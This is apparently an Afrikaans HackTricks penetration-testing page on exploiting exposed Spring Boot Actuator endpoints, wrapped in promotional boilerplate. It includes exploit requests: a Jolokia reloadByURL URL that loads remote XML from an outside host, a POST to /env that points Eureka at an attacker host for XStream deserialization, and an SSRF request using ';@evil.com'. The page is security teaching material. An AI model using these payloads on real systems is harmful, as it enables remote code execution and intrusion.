hacktricks/network-services-pentesting/pentesting-web/spring-actuators.md

Spring Actuators

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

• As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai, kyk na die SUBSCRIPTION PLANS!
• Kry die amptelike PEASS & HackTricks swag
• Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
• Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
• Deel jou hacking-truuks deur PR's in te dien by die HackTricks en HackTricks Cloud GitHub-opslag.

Spring Auth Bypass

Vanaf https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****

Uitbuiting van Spring Boot Actuators

Kyk na die oorspronklike pos vanaf [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]

Kernpunte:

• Spring Boot Actuators registreer eindpunte soos /health, /trace, /beans, /env, ens. In weergawes 1 tot 1.4 is hierdie eindpunte toeganklik sonder verifikasie. Vanaf weergawe 1.5 is slegs /health en /info nie-sensitief by verstek nie, maar ontwikkelaars skakel hierdie sekuriteit dikwels af.
• Sekere Actuator-eindpunte kan sensitiewe data blootstel of skadelike aksies toelaat:
• /dump, /trace, /logfile, /shutdown, /mappings, /env, /actuator/env, /restart, en /heapdump.
• In Spring Boot 1.x word actuators geregistreer onder die hoof-URL, terwyl dit in 2.x onder die basispad /actuator/ is.

Uitbuitingstegnieke:

1. Remote Code Execution via '/jolokia':

• Die /jolokia actuator-eindpunt stel die Jolokia-biblioteek bloot, wat HTTP-toegang tot MBeans moontlik maak.
• Die reloadByURL-aksie kan uitgebuit word om logkonfigurasies vanaf 'n eksterne URL te herlaai, wat kan lei tot blinde XXE of Remote Code Execution deur middel van vervaardigde XML-konfigurasies.
• Voorbeeld-uitbuit-URL: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml.

2. Konfigurasieverandering via '/env':

• As Spring Cloud Libraries teenwoordig is, maak die /env-eindpunt verandering van omgewings-eienskappe moontlik.
• Eienskappe kan gemanipuleer word om kwesbaarhede uit te buit, soos die XStream-deserialisasie-kwesbaarheid in die Eureka-serviceURL.
• Voorbeeld-uitbuit-POST-versoek:

POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream

3. Ander nuttige instellings:

• Eienskappe soos spring.datasource.tomcat.validationQuery, spring.datasource.tomcat.url, en spring.datasource.tomcat.max-active kan gemanipuleer word vir verskeie uitbuitings, soos SQL-injectie of die verandering van databasisverbindingstrengs.

Addisionele Inligting:

• 'n Omvattende lys van verstek-actuators kan hier gevind word.
• Die /env-eindpunt in Spring Boot 2.x gebruik JSON-formaat vir eienskapsverandering, maar die algemene konsep bly dieselfde.

Verwante Onderwerpe:

1. Env + H2 RCE:

• Besonderhede oor die uitbuiting van die kombinasie van die /env-eindpunt en H2-databasis kan hier gevind word.

2. SSRF op Spring Boot deur onkorrekte interpretasie van padname:

• Die hantering van matriksparameters (;) in HTTP-padname deur die Spring-raamwerk kan uitgebuit word vir Server-Side Request Forgery (SSRF).
• Voorbeeld-uitbuit-versoek:

GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

• As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai, kyk na die SUBSCRIPTION PLANS!
• Kry die amptelike PEASS & HackTricks swag
• Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
• Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
• Deel jou hacking-truuks deur PR's in te dien by die HackTricks en HackTricks Cloud GitHub-opslag.